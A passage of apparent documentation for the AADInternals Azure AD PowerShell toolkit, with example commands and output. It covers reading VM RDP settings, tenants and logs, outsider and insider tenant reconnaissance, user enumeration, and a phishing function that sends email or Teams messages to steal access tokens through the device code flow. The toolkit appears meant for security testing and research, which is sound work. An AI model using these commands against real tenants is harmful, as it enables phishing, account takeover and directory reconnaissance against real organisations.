    216      22     4864      14260       0.08   1272   2 taskhostw                                                    
    446      24    17080      22096       0.39   2796   0 taskhostw                                                    
    150       9     1664       8984       0.03   1196   0 VSSVC                                                        
    946      45    62896      78976      13.22   2068   0 WaAppAgent                                                   
    119       6     1504       5800       0.02   4152   0 WaSecAgentProv                                               
    646      41    45220      68180      85.78   2088   0 WindowsAzureGuestAgent                                       
    131       9     2252       8344       0.03   3868   0 WindowsAzureNetAgent                                         
    174      11     1548       6916       0.11    552   0 wininit                                                      
    234      11     2588      11160       0.09    612   1 winlogon                                                     
    266      12     2456      10120       0.08   3428   2 winlogon                                                     
    178      10     2776       8368       0.02   4052   0 WmiPrvSE
    
[stderr]

Get-AADIntAzureVMRdpSettings (AC)

Since version 0.3.3
Shows the RDP settings of the given VM

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Dump the RDP settings
Get-AADIntAzureVMRdpSettings -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup PRODUCTION -Server Server2

Output:

Not domain joined
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\PortNumber: 3389
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fDenyTSConnections: 
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\KeepAliveEnable: 1
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\KeepAliveInterval: 1
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\KeepAliveTimeout: 1
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fDisableAutoReconnect: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fInheritReconnectSame: 1
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fReconnectSame: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fInheritMaxSessionTime: 1
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fInheritMaxDisconnectionTime: 1
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\MaxDisconnectionTime: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\MaxConnectionTime: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fInheritMaxIdleTime: 1
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\MaxIdleTime: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\MaxInstanceCount: 4294967295

Get-AADIntAzureTenants (AC)

Since version 0.4.0
Lists all Azure AD tenants the user has access to.

Example:

# Get the Access Token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache

# List the tenants
Get-AADIntAzureTenants

Output:

Id                                   Country Name        Domains                                                                                                  
--                                   ------- ----        -------                                                                                                  
221769d7-0747-467c-a5c1-e387a232c58c FI      Firma Oy    {firma.mail.onmicrosoft.com, firma.onmicrosoft.com, firma.fi}              
6e3846ee-e8ca-4609-a3ab-f405cfbd02cd US      Company Ltd {company.onmicrosoft.com, company.mail.onmicrosoft.com,company.com}

Get-AADIntAzureInformation (AC)

Since version 0.4.0
Gets some Azure Tenant information, including certain tenant settings and ALL domains. The access token MUST be stored to cache! Works also for guest users!

The Tenant is not required for Access Token but is recommended as some tenants may have MFA.

Example:

# Get the Access Token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -Tenant 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd -SaveToCache

# Show the information
Get-AADIntAzureInformation -Tenant 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd

Output:

objectId                                  : 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
displayName                               : Company Ltd
usersCanRegisterApps                      : True
isAnyAccessPanelPreviewFeaturesAvailable  : False
showMyGroupsFeature                       : False
myGroupsFeatureValue                      : 
myGroupsGroupId                           : 
myGroupsGroupName                         : 
showMyAppsFeature                         : False
myAppsFeatureValue                        : 
myAppsGroupId                             : 
myAppsGroupName                           : 
showUserActivityReportsFeature            : False
userActivityReportsFeatureValue           : 
userActivityReportsGroupId                : 
userActivityReportsGroupName              : 
showRegisteredAuthMethodFeature           : False
registeredAuthMethodFeatureValue          : 
registeredAuthMethodGroupId               : 
registeredAuthMethodGroupName             : 
usersCanAddExternalUsers                  : False
limitedAccessCanAddExternalUsers          : False
restrictDirectoryAccess                   : False
groupsInAccessPanelEnabled                : False
selfServiceGroupManagementEnabled         : True
securityGroupsEnabled                     : False
usersCanManageSecurityGroups              : 
office365GroupsEnabled                    : False
usersCanManageOfficeGroups                : 
allUsersGroupEnabled                      : False
scopingGroupIdForManagingSecurityGroups   : 
scopingGroupIdForManagingOfficeGroups     : 
scopingGroupNameForManagingSecurityGroups : 
scopingGroupNameForManagingOfficeGroups   : 
objectIdForAllUserGroup                   : 
allowInvitations                          : False
isB2CTenant                               : False
restrictNonAdminUsers                     : False
enableLinkedInAppFamily                   : 0
toEnableLinkedInUsers                     : {}
toDisableLinkedInUsers                    : {}
linkedInSelectedGroupObjectId             : 
linkedInSelectedGroupDisplayName          : 
allowedActions                            : @{application=System.Object[]; domain=System.Object[]; group=System.Object[]; serviceprincipal=System.Object[]; 
                                            tenantdetail=System.Object[]; user=System.Object[]; serviceaction=System.Object[]}
skuInfo                                   : @{aadPremiumBasic=False; aadPremium=False; aadPremiumP2=False; aadBasic=False; aadBasicEdu=False; aadSmb=False; 
                                            enterprisePackE3=False; enterprisePremiumE5=False}
domains                                   : {@{authenticationType=Managed; availabilityStatus=; isAdminManaged=True; isDefault=False; isDefaultForCloudRedirections=False; 
                                            isInitial=False; isRoot=True; isVerified=True; name=company.com; supportedServices=System.Object[]; forceDeleteState=; state=; 
                                            passwordValidityPeriodInDays=; passwordNotificationWindowInDays=}, @{authenticationType=Managed; availabilityStatus=; 
                                            isAdminManaged=True; isDefault=False; isDefaultForCloudRedirections=False; isInitial=True; isRoot=True; isVerified=True; 
                                            name=company.onmicrosoft.com;}...}

Get-AADIntAzureSignInLog (M)

Since version 0.4.0
Returns the 50 latest entries from Azure AD sign-in log or single entry by id.

Example:

# Get the Access Token and save to cache
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Show the log
Get-AADIntAzureSignInLog

Output:

createdDateTime              id                                   ipAddress      userPrincipalName             appDisplayName                   
---------------              --                                   ---------      -----------------             --------------                   
2020-05-25T05:54:28.5131075Z b223590e-8ba1-4d54-be54-03071659f900 199.11.103.31  admin@company.onmicrosoft.com Azure Portal                     
2020-05-29T07:56:50.2565658Z f6151a97-98cc-444e-a79f-a80b54490b00 139.93.35.110  user@company.com              Azure Portal                     
2020-05-29T08:02:24.8788565Z ad2cfeff-52f2-442a-b8fc-1e951b480b00 11.146.246.254 user2@company.com             Microsoft Docs                   
2020-05-29T08:56:48.7857468Z e0f8e629-863f-43f5-a956-a4046a100d00 1.239.249.24   admin@company.onmicrosoft.com Azure Active Directory PowerShell
# Show the information for a single entry 
Get-AADIntAzureSignInLog -EntryId b223590e-8ba1-4d54-be54-03071659f900

Output:

id                                : b223590e-8ba1-4d54-be54-03071659f900
createdDateTime                   : 2020-05-25T05:54:28.5131075Z
userDisplayName                   : admin company
userPrincipalName                 : admin@company.onmicrosoft.com
userId                            : 289fcdf8-af4e-40eb-a363-0430bc98d4d1
appId                             : c44b4083-3bb0-49c1-b47d-974e53cbdf3c
appDisplayName                    : Azure Portal
ipAddress                         : 199.11.103.31
clientAppUsed                     : Browser
userAgent                         : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
...

Get-AADIntAzureAuditLog (M)

Since version 0.4.0
Returns the 50 latest entries from Azure AD sign-in log or single entry by id.

Example:

# Get the Access Token and save to cache
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Show the log
Get-AADIntAzureAuditLog

Output:

id                                                            activityDateTime             activityDisplayName   operationType result  initiatedBy   
--                                                            ----------------             -------------------   ------------- ------  -----------   
Directory_9af6aff3-dc09-4ac1-a1d3-143e80977b3e_EZPWC_41985545 2020-05-29T07:57:51.4037921Z Add service principal Add           success @{user=; app=}
Directory_f830a9d4-e746-48dc-944c-eb093364c011_1ZJAE_22273050 2020-05-29T07:57:51.6245497Z Add service principal Add           failure @{user=; app=}
Directory_a813bc02-5d7a-4a40-9d37-7d4081d42b42_RKRRS_12877155 2020-06-02T12:49:38.5177891Z Add user              Add           success @{app=; user=}
# Show the information for a single entry 
Get-AADIntAzureAuditLog -EntryId Directory_9af6aff3-dc09-4ac1-a1d3-143e80977b3e_EZPWC_41985545

Output:

id                  : Directory_9af6aff3-dc09-4ac1-a1d3-143e80977b3e_EZPWC_41985545
category            : ApplicationManagement
correlationId       : 9af6aff3-dc09-4ac1-a1d3-143e80977b3e
result              : success
resultReason        : 
activityDisplayName : Add service principal
activityDateTime    : 2020-05-29T07:57:51.4037921Z
loggedByService     : Core Directory
operationType       : Add
initiatedBy         : @{user=; app=}
targetResources     : {@{id=66ce0b00-92ee-4851-8495-7c144b77601f; displayName=Azure Credential Configuration Endpoint Service; type=ServicePrincipal; userPrincipalName=; 
                      groupType=; modifiedProperties=System.Object[]}}
additionalDetails   : {}

Kill chain functions

These functions are part of AAD & M365 Kill Chain.

Invoke-AADIntReconAsOutsider

Since version 0.4.0

Starts tenant recon of the given domain. Gets all verified domains of the tenant and extracts information such as their type.

Also checks whether Desktop SSO (aka Seamless SSO) is enabled for the tenant.

Value Description
DNS Does the DNS record exists?
MX Does the MX point to Office 365?
SPF Does the SPF contain Exchange Online?
Type Federated or Managed
STS The FQDN of the federated IdP’s (Identity Provider) STS (Security Token Service) server

Example:

# Invoke tenant recon as an outsider
Invoke-AADIntReconAsOutsider -Domain company.com | Format-Table

Output:

Tenant brand:       Company Ltd
Tenant name:        company
Tenant id:          05aea22e-32f3-4c35-831b-52735704feb3
DesktopSSO enabled: False

Name                           DNS   MX    SPF  Type      STS
----                           ---   --    ---  ----      ---
company.com                   True  True  True  Federated sts.company.com
company.mail.onmicrosoft.com  True  True  True  Managed
company.onmicrosoft.com       True  True  True  Managed
int.company.com              False False False  Managed

Invoke-AADIntUserEnumerationAsOutsider

Since version 0.4.0

Checks whether the given user exists in Azure AD or not. Works only if the user is in the tenant where Desktop SSO (aka Seamless SSO) is enabled for any domain.

Works also with external users!

Example 1:

# Invoke user enumeration as an outsider
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com

Output:

UserName         Exists
--------         ------
user@company.com True

Example 2:

# Invoke user enumeration as an outsider using a text file
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider

Output:

UserName                                               Exists
--------                                               ------
user@company.com                                       True
user2@company.com                                      False
external.user_gmail.com#EXT#@company.onmicrosoft.com   True
external.user_outlook.com#EXT#@company.onmicrosoft.com False

Invoke-AADIntReconAsGuest (AC)

Since version 0.4.0

Starts tenant recon of Azure AD tenant. Prompts for tenant. Retrieves information from Azure AD tenant, such as, the number of Azure AD objects and quota, and the number of domains (both verified and unverified).

Example 1:

# Get access token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache

# Invoke tenant recon as guest
$results = Invoke-AADIntReconAsGuest

Output:

Tenant brand:                Company Ltd
Tenant name:                 company.onmicrosoft.com
Tenant id:                   6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
Azure AD objects:            520/500000
Domains:                     6 (4 verified)
Non-admin users restricted?  True
Users can register apps?     True
Directory access restricted? False

# Show users allowed actions
$results.allowedActions
Output:

application      : {read}
domain           : {read}
group            : {read}
serviceprincipal : {read}
tenantdetail     : {read}
user             : {read, update}
serviceaction    : {consent}

Example 2:

# Get access token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache

# List Azure tenants the user has access to
Get-AADIntAzureTenants

Output:

Id                                   Country Name                      Domains
--                                   ------- ----                      -------
221769d7-0747-467c-a5c1-e387a232c58c FI      Firma Oy                  {firma.mail.onmicrosoft.com, firma.onmicrosoft.com, firma.fi}
6e3846ee-e8ca-4609-a3ab-f405cfbd02cd US      Company Ltd               {company.onmicrosoft.com, company.mail.onmicrosoft.com,company.com}

# Get a new access token for the specific tenant in case of MFA is required
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache -Tenant 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd

# Invoke tenant recon as guest
$results = Invoke-AADIntReconAsGuest
Output:

Tenant brand:                Company Ltd
Tenant name:                 company.onmicrosoft.com
Tenant id:                   6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
Azure AD objects:            520/500000
Domains:                     6 (4 verified)
Non-admin users restricted?  True
Users can register apps?     True
Directory access restricted? False

# Show users allowed actions
$results.allowedActions
Output:

application      : {read}
domain           : {read}
group            : {read}
serviceprincipal : {read}
tenantdetail     : {read}
user             : {read, update}
serviceaction    : {consent}

Invoke-AADIntUserEnumerationAsGuest (AC)

Since version 0.4.0

Crawls the target organisation for user names, groups, and roles. The starting point is the signed-in user, a given username, or a group id.

The crawl can be controlled with switches. Group members are limited to 1000 entries per group.

Switch Description
Groups Include user’s groups
GroupMembers Include members of user’s groups
Roles Include roles of user and group members. Can be very time consuming!
Manager Include user’s manager
Subordinates Include user’s subordinates (direct reports)

Parameters:

Parameter Description
UserName User principal name (UPN) of the user to search. If not given, the user name from the access token is used and treated as external (email_domain#EXT#@company.onmicrosoft.com)
GroupId Id of the group. If this is given, only the members of the group are included.

Example:

# Invoke user enumeration as a guest
$results = Invoke-AADIntUserEnumerationAsGuest -UserName user@company.com

Output:

Tenant brand: Company Ltd
Tenant name:  company.onmicrosoft.com
Tenant id:    6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
Logged in as: live.com#user@outlook.com
Users:        5
Groups:       2
Roles:        0

Example 2:

# Invoke user enumeration as an outsider using a text file
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider

Output:

UserName                                               Exists
--------                                               ------
user@company.com                                       True
user2@company.com                                      False
external.user_gmail.com#EXT#@company.onmicrosoft.com   True
external.user_outlook.com#EXT#@company.onmicrosoft.com False

Invoke-AADIntReconAsInsider (AC)

Since version 0.4.0

Starts tenant recon of Azure AD tenant.

Example 1:

# Get access token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache

# Invoke tenant recon as guest
$results = Invoke-AADIntReconAsGuest

Output:

Tenant brand:                Company Ltd
Tenant name:                 company.onmicrosoft.com
Tenant id:                   6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
Azure AD objects:            520/500000
Domains:                     6 (4 verified)
Non-admin users restricted?  True
Users can register apps?     True
Directory access restricted? False
Directory sync enabled?      true
Global admins                3

# List all admin roles that have members
$results.roleInformation | Where Members -ne $null | select Name,Members
Output:

Name                               Members                                                                                       
----                               -------                                                                                       
Company Administrator              {@{DisplayName=MOD Administrator; UserPrincipalName=admin@company.onmicrosoft.com}, @{D...
User Account Administrator         @{DisplayName=User Admin; UserPrincipalName=useradmin@company.com}                   
Directory Readers                  {@{DisplayName=Microsoft.Azure.SyncFabric; UserPrincipalName=}, @{DisplayName=MicrosoftAzur...
Directory Synchronization Accounts {@{DisplayName=On-Premises Directory Synchronization Service Account; UserPrincipalName=Syn...

Invoke-AADIntUserEnumerationAsInsider (AC)

Since version 0.4.0

Dumps user names and groups of the tenant.

By default, the first 1000 users and groups are returned.

Switch Description
Groups Include groups
GroupMembers Include members of the groups (not recommended)

Parameters:

Parameter Description
GroupId Id of the group. Id of the group. If this is given, only one group and members are included.

Example:

# Invoke user enumeration as a insider
$results = Invoke-AADIntUserEnumerationAsInsider

Output:

Users:        5542
Groups:        212
# List the first user's information
$results.Users[0]

Output:

id                              : 7ab0eb51-b7cb-4ff0-84ec-893a413d7b4a
displayName                     : User Demo
userPrincipalName               : User@company.com
onPremisesImmutableId           : UQ989+t6fEq9/0ogYtt1pA==
onPremisesLastSyncDateTime      : 2020-07-14T08:18:47Z
onPremisesSamAccountName        : UserD
onPremisesSecurityIdentifier    : S-1-5-21-854168551-3279074086-2022502410-1104
refreshTokensValidFromDateTime  : 2019-07-14T08:21:35Z
signInSessionsValidFromDateTime : 2019-07-14T08:21:35Z
proxyAddresses                  : {smtp:User@company.onmicrosoft.com, SMTP:User@company.com}
businessPhones                  : {+1234567890}
identities                      : {@{signInType=userPrincipalName; issuer=company.onmicrosoft.com; issuerAssignedId=User@company.com}} 

Invoke-AADIntPhishing

Since version 0.4.4

Sends phishing mail to given recipients and receives user’s access token using device code authentication flow.

The sent message is an html message. Uses string formatting to insert url and user code:

Placeholder Value
{0} user code
{1} signing url

Default message:

'<div>Hi!<br/>This is a message sent to you by someone who is using <a href="https://o365blog.com/aadinternals">AADInternals</a> phishing function. <br/><br/>Here is a <a href="{1}">link</a> you <b>should not click</b>.<br/><br/>If you still decide to do so, provide the following code when requested: <b>{0}</b>.</div>'

Email:
Phishing email

Teams:
Phishing message

Example1:

# Send a phishing email to a recipient using the default message
$tokens = Invoke-AADPhishing -Recipients "wvictim@company.com" -Subject "Johnny shared a document with you" -Sender "Johnny Carson <jc@somewhere.com>" -SMTPServer smtp.myserver.local

Output1:

Code: CKDZ2BURF
Mail sent to: wvictim@company.com
...
Received access token for william.victim@company.com

Example2:

# Get access token for teams
Get-AADIntAccessTokenForTeams -SaveToCache

# Send a teams message to a recipient using the default message
$tokens = Invoke-AADPhishing -Recipients "wvictim@company.com" -Teams

Output2:

Code: CKDZ2BURF
Teams message sent to: wvictim@company.com. Message id: 132473151989090816
...
Received access token for william.victim@company.com

Example3:

# Send a phishing email to recipients using a customised message and save the tokens to cache
Invoke-AADPhishing -Recipients "wvictim@company.com","wvictim2@company.com" -Subject "Johnny shared a document with you" -Sender "Johnny Carson <jc@somewhere.com>" -SMTPServer smtp.myserver.local -Message '<html>Hi!<br>Here is the link to the <a href="{1}">document</a>. Use the following code to access: <b>{0}</b>.</html>' -SaveToCache 

Code: CKDZ2BURF
Mail sent to: wvictim@company.com
Mail sent to: wvictim2@company.com
...
Received access token for william.victim@company.com
# Invoke the recon as an insider
$results = Invoke-AADIntReconAsInsider

Output3:

Tenant brand:                company.com
Tenant name:                 company.onmicrosoft.com
Tenant id:                   d4e225d6-8877-4bc6-b68c-52c44011ba81
Azure AD objects:            147960/300000
Domains:                     5 (5 verified)
Non-admin users restricted?  True
Users can register apps?     True
Directory access restricted? False
Directory sync enabled?      true
Global admins                10
Dr Nestori Syynimaa avatar
About Dr Nestori Syynimaa
Dr Syynimaa works as a CIO of eight cities and municipalities surrounding Tampere, the largest inland city in Nordic countries. He also runs his own consultation business Gerenios. Before moving to his current position, Dr Syynimaa worked as a consultant, trainer, and university lecturer for almost 20 years. He is a regular speaker on Office 365 and Azure security in scientific and professional conferences. Dr Syynimaa is Microsoft Certified Expert (Microsoft 365) and Microsoft Certified Trainer.
comments powered by Disqus